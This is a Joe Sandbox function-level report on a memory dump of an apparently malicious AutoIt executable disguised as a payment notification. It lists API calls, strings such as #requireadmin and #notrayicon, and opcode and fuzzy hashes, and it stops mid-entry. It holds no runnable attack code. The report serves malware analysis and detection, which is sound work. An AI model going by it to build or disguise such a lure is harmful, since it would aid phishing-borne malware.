Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 00c0908c87c4cdd7e78e1beddff8e9ef5416c9209c36a40905557e9ce9d05cde
Instruction ID: 4f78511e4372f76bd6dcf41d2e2e2511cd0d48e6c50026e1758691f787c8292e
Opcode Fuzzy Hash: 00c0908c87c4cdd7e78e1beddff8e9ef5416c9209c36a40905557e9ce9d05cde
Instruction Fuzzy Hash: 3F2160B5A00209AFDB10DF64DCD1EB737ADEB8A394B040059FA049B351CB30EC52CB61

Function 009995AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0099961D

Strings

#OnAutoItStartRegister, xrefs: 009995F3
#requireadmin, xrefs: 009995D9
#notrayicon, xrefs: 009995B7

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 0a0023fea13d6dd0fbcc728fbb86cb661269e4b733c713cbcecb7c5b76472dea
Instruction ID: b74f8612304aa0acef74455284602dd0f323a5f4208b3d5e3b99845ddefe3179
Opcode Fuzzy Hash: 0a0023fea13d6dd0fbcc728fbb86cb661269e4b733c713cbcecb7c5b76472dea
Instruction Fuzzy Hash: 2221387210461166DB31AA2D9C16FB7B3AC9FD1314F10442EFD499B081EB55AD45C3D7

Function 009C37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 009C3840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 009C3850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 009C3876

Strings

Listbox, xrefs: 009C380F

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: df9e7d6ec915a875fc65ba8cd6c39d9ce1a6c73be0887ed084abadc00fa370de
Instruction ID: a07aafeccdc5079286807460083a120f1127f0150d205a6635b985a53cf9bdb0
Opcode Fuzzy Hash: df9e7d6ec915a875fc65ba8cd6c39d9ce1a6c73be0887ed084abadc00fa370de
Instruction Fuzzy Hash: D5219272A10118BBEF119F55DC85FBB3B6EEF89754F11C118F9049B190C671DC528BA1

Function 009A49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009A4A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 009A4A5C
SetErrorMode.KERNEL32(00000000,?,?,009CCC08), ref: 009A4AD0

Strings

%lu, xrefs: 009A4A6F

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 93053901b53e9f9811393d5aaecd517f2578cd636c4b8494ba0979480925960d
Instruction ID: b5f523aa79b22648fe143936d726ee992f9ace1904a2a877bbfcb60e3e1168c5
Opcode Fuzzy Hash: 93053901b53e9f9811393d5aaecd517f2578cd636c4b8494ba0979480925960d
Instruction Fuzzy Hash: 25315375A04109AFDB10DF54C885FAA7BF8EF45308F1480A5F509DB252D771EE45CBA1

Function 009C41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 009C424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 009C4264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 009C4271

Strings

msctls_trackbar32, xrefs: 009C4226

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: d9d4d4bd7252b2a40ccc020b136b636339d58c5d9f55be4107a2e1f851dc5028
Instruction ID: 3f99bfe559c6b414479af1f55e92fc2203983fa25ed8479a1d4ab69d757df523
Opcode Fuzzy Hash: d9d4d4bd7252b2a40ccc020b136b636339d58c5d9f55be4107a2e1f851dc5028
Instruction Fuzzy Hash: AF110631740208BFEF205F69CC46FAB3BACEF95B54F010518FA55E20A0D271DC619B20

Function 00992F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00936B57: _wcslen.LIBCMT ref: 00936B6A

Part of subcall function 00992DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00992DC5
Part of subcall function 00992DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00992DD6
Part of subcall function 00992DA7: GetCurrentThreadId.KERNEL32 ref: 00992DDD
Part of subcall function 00992DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00992DE4

GetFocus.USER32 ref: 00992F78

Part of subcall function 00992DEE: GetParent.USER32(00000000), ref: 00992DF9

GetClassNameW.USER32(?,?,00000100), ref: 00992FC3
EnumChildWindows.USER32(?,0099303B), ref: 00992FEB

Strings

%s%d, xrefs: 00992FFF

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 6125b948aa0b332ac97b7ec1acb73ebaa6af9cb566adcdbf7e8610f77a947576
Instruction ID: eaf04fcc1e8a42bbe8332d94e45b291eba717ea66bff32390f5c0872ccbdbf9f
Opcode Fuzzy Hash: 6125b948aa0b332ac97b7ec1acb73ebaa6af9cb566adcdbf7e8610f77a947576
Instruction Fuzzy Hash: 3D1184B16002056BCF147F789D99FED776AAFD4304F048075FA09AB292DE7099459B70

Function 009C5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009C58C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009C58EE
DrawMenuBar.USER32(?), ref: 009C58FD

Strings

0, xrefs: 009C588F

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: cede32cf312fe50b8c5f294bc3a8dd19f6837df6a423dd3a07f1053d8b3ad84a
Instruction ID: 8902851f75161cfead3d813c6ed55aceaf4fc570d5661fa7b395dd47c3f6ee96
Opcode Fuzzy Hash: cede32cf312fe50b8c5f294bc3a8dd19f6837df6a423dd3a07f1053d8b3ad84a
Instruction Fuzzy Hash: CB015B71914218EFDB219F11DC44FAFBBB8FB85361F108499F849D6161DB349A84EF22

Function 0098D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0098D3BF
FreeLibrary.KERNEL32 ref: 0098D3E5

Strings

X64, xrefs: 0098D2A8
GetSystemWow64DirectoryW, xrefs: 0098D3B9

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: 43db0f85d468b17063a5cb7ab6afb0c980c3ab5788d6cf36ca8b73fc27656983
Instruction ID: 70f19bda5ba7d192907489b4b35fb336fa6967b6e172dc9ac21aec585922291a
Opcode Fuzzy Hash: 43db0f85d468b17063a5cb7ab6afb0c980c3ab5788d6cf36ca8b73fc27656983
Instruction Fuzzy Hash: 77F0E5A1C4B621ABD77236219C54E69BB58AF10701B58895AF80AF63C4DB24CD408793

Function 0099007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e14b931e53045a5772125765b801fac0c07203e6e11cc41a78fac903c1b6039
Instruction ID: 0b9f028aa4530fb39e17ab3f414e7053824967dd36dacfcdb65c1313bc916e4f
Opcode Fuzzy Hash: 1e14b931e53045a5772125765b801fac0c07203e6e11cc41a78fac903c1b6039
Instruction Fuzzy Hash: 4BC13D75A0021AEFDB14CF98C894EAEB7B9FF88704F208598E525EB251D731DD41DB90

Function 009B342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 009B3459
CoUninitialize.OLE32 ref: 009B3463
VariantInit.OLEAUT32(?), ref: 009B346E
VariantClear.OLEAUT32(?), ref: 009B371B

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: a46d6c9d86da45409d89b816471412dba89304240ca69afa3e9bb8a0bbbf3452
Instruction ID: c37cfd30890cb7ebf6d00760d18c67f7d0886ff97f283183cbe27edeb36bb6fc
Opcode Fuzzy Hash: a46d6c9d86da45409d89b816471412dba89304240ca69afa3e9bb8a0bbbf3452
Instruction Fuzzy Hash: 45A149756046049FCB14DF68C585B6AB7E5FF88724F048859F98A9B362DB30EE01CF91

Function 00990436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,009CFC08,?), ref: 009905F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,009CFC08,?), ref: 00990608
CLSIDFromProgID.OLE32(?,?,00000000,009CCC40,000000FF,?,00000000,00000800,00000000,?,009CFC08,?), ref: 0099062D
_memcmp.LIBVCRUNTIME ref: 0099064E

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 2bcb299dac5c60ae94c3e03ad15c0f11b1e436f2ad06c81561c3ef5de63bbba3
Instruction ID: 58842f13c5b5bc3a8cccc13db2853492294b9c673ced6e4b0ee6886b72f7f81c
Opcode Fuzzy Hash: 2bcb299dac5c60ae94c3e03ad15c0f11b1e436f2ad06c81561c3ef5de63bbba3
Instruction Fuzzy Hash: 3B81D675A00109AFCF04DF98C984EEEB7B9FF89315F204558F516AB250DB71AE06CB61

Function 00971391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 009714C0

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 70e7fd1b05c885cca27def0d2ab5e5ae31f415105343c9766d4c7a3c61cc8482
Instruction ID: 659c427070642f356149990205a08776e45b6fadcf0d6e9b100978ad1462a74e
Opcode Fuzzy Hash: 70e7fd1b05c885cca27def0d2ab5e5ae31f415105343c9766d4c7a3c61cc8482
Instruction Fuzzy Hash: 8A415D73A00510ABDB25BBFD8C46BBE3AA9EFC1770F14C625F82DD72A1E63449415361

Function 009C6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0104E0B8,?), ref: 009C62E2
ScreenToClient.USER32(?,?), ref: 009C6315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 009C6382

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 467942bcdc5e61acd09a5d27e739c1fdb61e6ddfd12b15733da3b2fe5e9c72da
Instruction ID: 0f19d8c9fb142f9f53b2bf9d331d78aec2418b7656eb1b1a323b5350473b3190
Opcode Fuzzy Hash: 467942bcdc5e61acd09a5d27e739c1fdb61e6ddfd12b15733da3b2fe5e9c72da
Instruction Fuzzy Hash: CA510874A00249AFDB10DF68D980EAE7BB9EB85360F10816DF8659B2A0D730AD81CB51

Function 009B1AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 009B1AFD
WSAGetLastError.WSOCK32 ref: 009B1B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 009B1B8A
WSAGetLastError.WSOCK32 ref: 009B1B94

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: bd8463fe4860d6530c0d9f06ec9f758d5c519c1e962f437729931a2b10e80b06
Instruction ID: ac24ed07b581c710964d37ea3ac2b3c9da24ab37823f15fa4503f3c104e0ebb8
Opcode Fuzzy Hash: bd8463fe4860d6530c0d9f06ec9f758d5c519c1e962f437729931a2b10e80b06
Instruction Fuzzy Hash: 3041D274600200AFE720AF24C886F6A7BE5AB84718F54C45CFA1A9F3D3D772DD418B90

Function 0096B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddab5de6aa2bb596895d1fc3cd006c172e05b92c48076bf3d6424949564b6882
Instruction ID: 3a878ec7d3fea290f5c473733bf8da7aeba0b7366c8a788d8dd36b886cd4a790
Opcode Fuzzy Hash: ddab5de6aa2bb596895d1fc3cd006c172e05b92c48076bf3d6424949564b6882
Instruction Fuzzy Hash: C6411972A00714BFD724AF38CC41BAABBEDEFC4720F10852AF556DB691E77199418780

Function 009A56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 009A5783
GetLastError.KERNEL32(?,00000000), ref: 009A57A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 009A57CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 009A57FA

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 64a81e0662be86b6ab6b6b68fda1ddbaf86d5cb24907f0afbabe1f1037057baa
Instruction ID: 1fb3b39a9a24a21fca7fc2955f2a950ed01dd6c854fd310beefec29d575206a2
Opcode Fuzzy Hash: 64a81e0662be86b6ab6b6b68fda1ddbaf86d5cb24907f0afbabe1f1037057baa
Instruction Fuzzy Hash: FB411C79600610DFCB25DF55C444A19BBE5EF89320F198488F84AAB362CB34FD00CF91

Function 0096D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00956D71,00000000,00000000,009582D9,?,009582D9,?,00000001,00956D71,8BE85006,00000001,009582D9,009582D9), ref: 0096D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0096D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0096D9AB
__freea.LIBCMT ref: 0096D9B4

Part of subcall function 00963820: RtlAllocateHeap.NTDLL(00000000,?,00A01444,?,0094FDF5,?,?,0093A976,00000010,00A01440,009313FC,?,009313C6,?,00931129), ref: 00963852

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 9aa08d618acc0c04fba7773bf59b45e241582f9334ced42885133cf7a4bd94ad
Instruction ID: d1a2faec3fcc2c06022756d1c36ef81044f073f0c9706610d892c260d8868fbd
Opcode Fuzzy Hash: 9aa08d618acc0c04fba7773bf59b45e241582f9334ced42885133cf7a4bd94ad
Instruction Fuzzy Hash: A431BE72E1220AABDF24DF65DC45EAF7BA9EB41710B054168FC18D7250EB35CD54CBA0

Function 009C52C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 009C5352
GetWindowLongW.USER32(?,000000F0), ref: 009C5375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 009C5382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009C53A8

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: a5185e63d26debb7b5255cf3c4b5c07b1abcdfe0bf9044b2fad180abbc4aaeea
Instruction ID: 6d1bea7f0203fc75712935b53efee9fccea483b72ebe21093c1ef2684510401c
Opcode Fuzzy Hash: a5185e63d26debb7b5255cf3c4b5c07b1abcdfe0bf9044b2fad180abbc4aaeea
Instruction Fuzzy Hash: FA31D230E55A88EFEB309A54CC05FE87769AB043D0F59410AFA10961E2C7B4B9C0EB43

Function 0099AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

